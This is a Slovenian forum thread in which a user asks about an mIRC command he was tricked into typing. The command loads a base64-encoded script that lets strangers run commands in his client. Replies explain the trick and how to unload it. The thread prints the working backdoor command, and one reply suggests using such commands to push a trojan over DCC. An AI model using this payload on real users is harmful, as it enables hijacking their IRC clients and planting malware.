» »

nov bug al neki podobnga v ircu?

nov bug al neki podobnga v ircu?

tx-z ::

//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg nickname bla bla bla


hmm..torej to sm vpisu v irc..dl kr en nick pa kr en tekst.. in kaj se zgodi..
čez ene par minut se mi odpre v ircu novo okno, kot da mi je nekdo napisu eno sporočilo, ampak ni nč...no to nardi za dva uporabnika..in pol se mi kr spremeni nick...najprej se mi je spremenu v telebajs, pol pa še v bublbubl...kaj je to??
tx-z

OmegaBlue ::

Tole izkorišča neumnost(lahkovernost) uporabnika, ustvaru(napiše) skriptico ti jo naloada in poženi in "zlonmernež" ima poln dostop do tvojega mirca.

napiši /unload -rs czm.mrc in živi mirno dalje.


In ne nasedaj takim stvarem!!!!!
Never attribute to malice that which can be adequately explained by stupidity.

R0K ::

Ja pol pa še kak msg zram, da če to napišeš dobiš bota, lohk kikneš kirga alpa celo kak pass do xx strani. Uglavnem svašta! :)

Drugače pa tudi če si to napisal, pa bi ti še vedno naprej nagajo, samo na nov naloži mirc, drugače kaj hujšega ti itak ne more naredit (dokler ne prenese kakšnih datotek preko te skripte) ...

tx-z ::

sj sm na nov naložu..sam vprašat sm hotu..no sj dela..
tx-z

tx-z ::

aja..torej če nekdo to napiše pa ma lahko nekdo dostop do njegovga irca...a sm lahk to jst? torej da nekomu povem da to napiše pa a lahko jst pol upravlam irca??
tx-z

R0K ::

hmmm .. upravljaš je široka beseda ... pomoje lohk naštimaš (s podobnimi komandami) da mu prek dcc pošlješ recimo kakega trojanca pol si pa na konju in mu ne upravljaš samo mirca :)).

drgač z eno komando (kot je recimo ta k si jo ti povedu) pa ne moreš ne vem kaj ...


Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

Vzdevki :) (strani: 1 2 )

Oddelek: Loža
619017 (4608) Kamran
»

DDoS atack; kje nej DLjam security za Win XP?

Oddelek: Pomoč in nasveti
331636 (1272) fruit
»

Njegov ip

Oddelek: Omrežja in internet
151400 (1034) ledo
»

Mirc dodatek kaj naredi ta koda? In kakšna je zaščita

Oddelek: Programska oprema
61064 (984) OmegaBlue
»

Kaj nardi ta skripta?

Oddelek: Programiranje
141015 (926) Monster

Več podobnih tem